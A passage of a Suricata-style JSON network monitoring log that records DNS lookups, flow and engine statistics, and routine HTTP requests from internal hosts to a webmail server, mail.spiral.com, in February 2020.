eout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":5,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} {"timestamp":"2020-02-29T00:20:55.135421+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37860,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:20:56.000605+0000","flow_id":787291901945212,"event_type":"flow","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:19:50.484732+0000","end":"2020-02-29T00:19:55.771502+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:56.000896+0000","flow_id":969742112447211,"event_type":"flow","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":36752,"start":"2020-02-29T00:19:46.449259+0000","end":"2020-02-29T00:19:55.763745+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:00.316893+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":784,"tx_id":0}} {"timestamp":"2020-02-29T00:21:02.000253+0000","event_type":"stats","stats":{"uptime":14914,"capture":{"kernel_packets":137463,"kernel_drops":0},"decoder":{"pkts":137469,"bytes":94234978,"invalid":193,"ipv4":135918,"ipv6":10,"ethernet":137469,"raw":0,"null":0,"sll":0,"tcp":130410,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2819,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} {"timestamp":"2020-02-29T00:21:03.000612+0000","flow_id":784388504545285,"event_type":"flow","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":698,"start":"2020-02-29T00:19:57.387077+0000","end":"2020-02-29T00:20:02.578497+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:04.000653+0000","flow_id":1369582092931394,"event_type":"flow","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":43,"pkts_toclient":40,"bytes_toserver":8611,"bytes_toclient":34906,"start":"2020-02-29T00:19:47.905538+0000","end":"2020-02-29T00:20:03.977950+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:05.000382+0000","flow_id":1602206096945749,"event_type":"flow","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:03.979541+0000","end":"2020-02-29T00:16:04.086107+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:09.000186+0000","event_type":"stats","stats":{"uptime":14921,"capture":{"kernel_packets":137469,"kernel_drops":0},"decoder":{"pkts":137472,"bytes":94235176,"invalid":193,"ipv4":135921,"ipv6":10,"ethernet":137472,"raw":0,"null":0,"sll":0,"tcp":130413,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2821,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20502,"memcap_state":0,"memcap_global":0},"http":{"memuse":18854,"memcap":0}}} {"timestamp":"2020-02-29T00:21:11.000855+0000","flow_id":2077710532005367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6224,"start":"2020-02-29T00:20:04.445943+0000","end":"2020-02-29T00:20:10.267899+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:12.088636+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:12.344766+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:21:14.000206+0000","flow_id":144498492304586,"event_type":"flow","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:13.650442+0000","end":"2020-02-29T00:16:13.758493+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:16.000229+0000","event_type":"stats","stats":{"uptime":14928,"capture":{"kernel_packets":137475,"kernel_drops":0},"decoder":{"pkts":137492,"bytes":94245717,"invalid":193,"ipv4":135941,"ipv6":10,"ethernet":137492,"raw":0,"null":0,"sll":0,"tcp":130429,"udp":5304,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2842,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2858,"synack":2849,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1877,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2427,"failed_udp":114},"tx":{"http":4806,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2509}},"flow_mgr":{"closed_pruned":2822,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":104401,"memcap":0}}} {"timestamp":"2020-02-29T00:21:17.200064+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48902,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.208063+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64597,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:17.386661+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360}} {"timestamp":"2020-02-29T00:21:17.425113+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":37397,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.440353+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} {"timestamp":"2020-02-29T00:21:17.442545+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.442807+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} {"timestamp":"2020-02-29T00:21:17.459364+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:21:17.460875+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:21:17.462601+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} {"timestamp":"2020-02-29T00:21:17.462956+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} {"timestamp":"2020-02-29T00:21:17.567336+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.567589+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:21:17.569331+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.569674+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:21:17.570872+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.572992+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} {"timestamp":"2020-02-29T00:21:17.581785+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:21:17.583865+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:21:17.587547+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} {"timestamp":"2020-02-29T00:21:17.587865+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:21:17.591276+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 